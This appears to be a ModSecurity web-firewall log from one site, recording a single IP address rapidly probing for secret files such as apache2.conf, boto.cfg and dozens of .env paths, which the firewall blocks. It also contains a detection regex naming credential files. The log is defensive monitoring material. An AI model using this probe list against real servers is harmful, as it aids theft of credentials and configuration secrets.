[Tue May 26 14:49:42.342408 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrpAAAnSQ"]
[Tue May 26 14:49:42.343420 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrowAAAL4"]
[Tue May 26 14:49:42.344075 2026] [security2:error] [pid 648203:tid 648459] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrrQAAAQM"]
[Tue May 26 14:49:42.344672 2026] [security2:error] [pid 648203:tid 648409] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrsAAAANE"]
[Tue May 26 14:49:42.347081 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTrtQAAAI4"]
[Tue May 26 14:49:42.353328 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrbEQDDtxJNiDrdTrqQAAAMg"]
[Tue May 26 14:49:42.451461 2026] [security2:error] [pid 648203:tid 648216] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVlrrEQDDtxJNiDrdTrvwAAkww"]
[Tue May 26 14:49:42.463501 2026] [security2:error] [pid 648203:tid 648263] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/etc/boto.cfg"] [unique_id "ahVlrrEQDDtxJNiDrdTrwAAAmzs"]
[Tue May 26 14:49:42.464767 2026] [security2:error] [pid 648203:tid 648321] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/fe/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTrwQAAm3U"]
[Tue May 26 14:49:42.478606 2026] [security2:error] [pid 648203:tid 648206] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/front/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTrzAAAmwI"]
[Tue May 26 14:49:42.488031 2026] [security2:error] [pid 648203:tid 648218] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/frontend/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTrzwAAmw4"]
[Tue May 26 14:49:42.535098 2026] [security2:error] [pid 648203:tid 648449] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTryAAAAPk"]
[Tue May 26 14:49:42.536378 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTrygAAALk"]
[Tue May 26 14:49:42.548526 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTrzgAAAPM"]
[Tue May 26 14:49:42.548748 2026] [security2:error] [pid 648203:tid 648398] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTrzQAAAMY"]
[Tue May 26 14:49:42.574400 2026] [security2:error] [pid 648203:tid 648402] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr2QAAAMo"]
[Tue May 26 14:49:42.575742 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr0wAAAPQ"]
[Tue May 26 14:49:42.581090 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr2wAAAJo"]
[Tue May 26 14:49:42.583960 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr2gAAAKw"]
[Tue May 26 14:49:42.600431 2026] [security2:error] [pid 648203:tid 648257] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/info.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr4wABADU"]
[Tue May 26 14:49:42.610698 2026] [security2:error] [pid 648203:tid 648254] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/infophp.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr5wABADI"]
[Tue May 26 14:49:42.612265 2026] [security2:error] [pid 648203:tid 648262] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/infos.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr6AABADo"]
[Tue May 26 14:49:42.657343 2026] [security2:error] [pid 648203:tid 648456] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr4QABACI"]
[Tue May 26 14:49:42.667739 2026] [security2:error] [pid 648203:tid 648438] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr5gAAAO4"]
[Tue May 26 14:49:42.667758 2026] [security2:error] [pid 648203:tid 648336] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr5QAAAIg"]
[Tue May 26 14:49:42.686793 2026] [security2:error] [pid 648203:tid 648236] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/laravel/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTr7wABACA"]
[Tue May 26 14:49:42.688983 2026] [security2:error] [pid 648203:tid 648271] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/lms/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTr8AABAEM"]
[Tue May 26 14:49:42.701542 2026] [security2:error] [pid 648203:tid 648258] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/local/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTr8gABADY"]
[Tue May 26 14:49:42.703235 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr7QAAAIk"]
[Tue May 26 14:49:42.706789 2026] [security2:error] [pid 648203:tid 648366] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr7gAAAKY"]
[Tue May 26 14:49:42.733574 2026] [security2:error] [pid 648203:tid 648287] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/market/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTr-wABAFM"]
[Tue May 26 14:49:42.749109 2026] [security2:error] [pid 648203:tid 648226] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/marketing/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTr_wABABY"]
[Tue May 26 14:49:42.760019 2026] [security2:error] [pid 648203:tid 648270] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/media/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsAQABAEI"]
[Tue May 26 14:49:42.771484 2026] [security2:error] [pid 648203:tid 648437] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr9AAAAO0"]
[Tue May 26 14:49:42.779952 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr-gAAAJI"]
[Tue May 26 14:49:42.796914 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr_QAAAM8"]
[Tue May 26 14:49:42.811822 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTr_gAAAPg"]
[Tue May 26 14:49:42.829323 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsAwAAAK0"]
[Tue May 26 14:49:42.835119 2026] [security2:error] [pid 648203:tid 648267] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/new/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsEQABAD8"]
[Tue May 26 14:49:42.837519 2026] [security2:error] [pid 648203:tid 648241] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node-api/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsEgABACU"]
[Tue May 26 14:49:42.848755 2026] [security2:error] [pid 648203:tid 648285] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsFwABAFE"]
[Tue May 26 14:49:42.851344 2026] [security2:error] [pid 648203:tid 648303] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node/api/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsGQABAGM"]
[Tue May 26 14:49:42.856796 2026] [security2:error] [pid 648203:tid 648260] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/node/backend/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsGwABADg"]
[Tue May 26 14:49:42.882266 2026] [security2:error] [pid 648203:tid 648277] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/nodeapi/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsHAABAEk"]
[Tue May 26 14:49:42.897263 2026] [security2:error] [pid 648203:tid 648269] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/nodeweb/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsHQABAEE"]
[Tue May 26 14:49:42.950774 2026] [security2:error] [pid 648203:tid 648279] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/old/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsKAABAEs"]
[Tue May 26 14:49:42.978254 2026] [security2:error] [pid 648203:tid 648302] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/opt/.env"] [unique_id "ahVlrrEQDDtxJNiDrdTsLQABAGI"]
[Tue May 26 14:49:43.304957 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsCQAAAK4"]
[Tue May 26 14:49:43.307994 2026] [security2:error] [pid 648203:tid 648459] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsDwAAAQM"]
[Tue May 26 14:49:43.330479 2026] [security2:error] [pid 648203:tid 648391] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlrrEQDDtxJNiDrdTsEAAAAL8"]
[Tue May 26 14:49:43.337121 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsOgAAAKg"]
[Tue May 26 14:49:43.340609 2026] [security2:error] [pid 648203:tid 648375] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlr7EQDDtxJNiDrdTsTAAAAK8"]
